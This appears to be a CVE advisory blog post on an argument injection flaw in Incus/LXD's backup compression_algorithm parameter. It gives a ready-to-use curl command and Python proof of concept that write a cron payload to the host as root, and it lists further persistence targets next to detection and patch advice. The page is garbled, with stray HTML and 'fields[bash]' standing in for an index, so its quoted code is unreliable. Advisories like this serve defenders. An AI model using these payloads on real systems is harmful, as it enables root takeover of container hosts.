Incus/LXD, Argument Injection, CVE-2026-28384 (Critical) -DC-Jun2026-683

By /

Listen to this Post

How CVE-2026-28384 Works

CVE-2026-28384 is a critical vulnerability in Incus and Canonical LXD arising from improper sanitization of the `compression_algorithm` parameter. The flaw exists in the backup and image creation endpoints, where user input is used to construct a command line for a compression utility.
The root cause is a validation logic error. The Incus/LXD daemon parses the user-provided `compression_algorithm` string and checks only the first token (the compression binary name) against an allowlist. The code does not validate or reject any additional arguments that may follow the first token.
When a backup or image export is requested, the `compressFile()` function is invoked. It prepends the `-c` argument to the user-supplied fields and passes the entire resulting list to exec.Command(). This means an attacker can inject arbitrary command-line arguments that will be passed directly to the compression binary.

The core vulnerable code flow is:

1. The user submits a `compression_algorithm` value.

  1. The daemon splits the value into fields using shellquote.Split().
  2. It checks `fields 
    ` against an allowlist of compressors like <code>zstd</code>, <code>gzip</code>, <code>xz</code>, etc.</li>
<li>It then calls `exec.LookPath(fields[bash])` to verify the binary exists.</li>
<li>Crucially, `fields[1:]` are not sanitized and are appended to the argument list.</li>
<li>The final command is executed as <code>fields[bash] -c [fields[1:]]</code>.
By supplying a value such as <code>zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/.../payload</code>, an attacker can cause the daemon to execute <code>zstd -c -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/.../payload</code>. This writes a file to an arbitrary location on the host, leading to arbitrary command execution.
The vulnerability affects Incus and LXD versions from 4.12 through 6.6 and was patched in Incus 6.7 and LXD snap versions 5.0.6, 5.21.4, and 6.7.</li>
</ol>

<h2 style="color: blue;">DailyCVE Form:</h2>

Platform: Incus / LXD
Version: 4.12 through 6.6
Vulnerability: Argument Injection
Severity: Critical
date: 2026-03-12

<h2 style="color: blue;">Prediction: Patch available (2026-03)</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Analytics</h2>

The vulnerability is triggered by sending a crafted `compression_algorithm` value in an API request to the `/1.0/instances/{name}/backups` or image creation endpoints. The following is a breakdown of the attack.

<h2 style="color: blue;">Vulnerable Code Snippet (Go):</h2>

[bash]
fields, err := shellquote.Split(value)
...
if !slices.Contains([]string{"bzip2", "gzip", "lz4", "lzma", "pigz", "pzstd", "pxz", "tar2sqfs", "xz", "zstd"}, fields[bash]) {
return fmt.Errorf("Compression algorithm %q isn't currently supported", fields[bash])
}
_, err = exec.LookPath(fields[bash])
// Extra arguments are not rejected.
...
args := []string{"-c"}
if len(fields) > 1 {
args = append(args, fields[1:]...)
}
cmd := exec.Command(fields[bash], args...)

    Bash Command to Exploit (Conceptual):

    This demonstrates the argument injection that leads to arbitrary file write.
The payload writes a cron job to the host.
curl -k -X POST "https://<target>:8443/1.0/instances/<instance>/backups?project=default" \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '{
"compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/containers/<project>_<instance>/rootfs/var/tmp/payload",
"instance_only": true
}'

    Python PoC Snippet:

    import requests
import json
url = "https://<target>:8443/1.0/instances/<instance>/backups"
headers = {
"Authorization": "Bearer <token>",
"Content-Type": "application/json"
}
payload = {
"compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/containers/default_instance/rootfs/var/tmp/payload",
"instance_only": True
}
response = requests.post(url, headers=headers, data=json.dumps(payload), verify=False)
print(response.status_code)

    Detection:

    Monitor Incus/LXD API logs for suspicious `compression_algorithm` values containing shell metacharacters or extra arguments like -o, --pass-through, or -d.

    Exploit:

    An authenticated attacker can exploit this by:

    1. Uploading a Payload: Creating a file within a writable directory of a container instance (e.g., /var/tmp/payload).
    2. Crafting the Request: Submitting a backup request with a `compression_algorithm` value that includes arguments to write the payload to a sensitive host location. Common targets include:

    `/etc/cron.d/` – for scheduled command execution.

    `/root/.ssh/authorized_keys` – for persistent SSH access.

    `/etc/profile.d/` – for execution during user login.

    1. Triggering the Backup: The API call causes the daemon to execute the injected command, writing the file to the host.
      The provided PoC automates this by uploading a cron payload and then requesting a backup with the malicious compression_algorithm.

    Protection:

    Patch Immediately: Upgrade to Incus version 6.7 or later, or LXD snap versions 5.0.6, 5.21.4, or 6.7 or later.
    API Access Restriction: Restrict access to the Incus/LXD API to only trusted users and networks.
    Input Validation: Implement strict allowlisting for the entire `compression_algorithm` string, not just the first token.
    Command Construction: Avoid constructing shell commands from user input. Use parameterized APIs or libraries that separate arguments from the command.

    Impact:

    Arbitrary File Write: An attacker can write files to any location on the host filesystem that the Incus/LXD daemon (typically running as root) has access to.
    Privilege Escalation: By writing to system directories like /etc/cron.d, an attacker can achieve arbitrary command execution with root privileges.
    Full System Compromise: This can lead to a complete compromise of the host system, allowing the attacker to install backdoors, exfiltrate data, or pivot to other systems on the network.

    🎯Let’s Practice Exploiting & Learn Patching For Free:

    🎓 Live Courses & Certifications:

    Join Undercode Academy for Verified Certifications

    🚀 Request a Custom Project:

    Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
    [email protected]
    💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

    Sources:

    Reported By: github.com
    Extra Source Hub:
    Undercode

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow DailyCVE & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top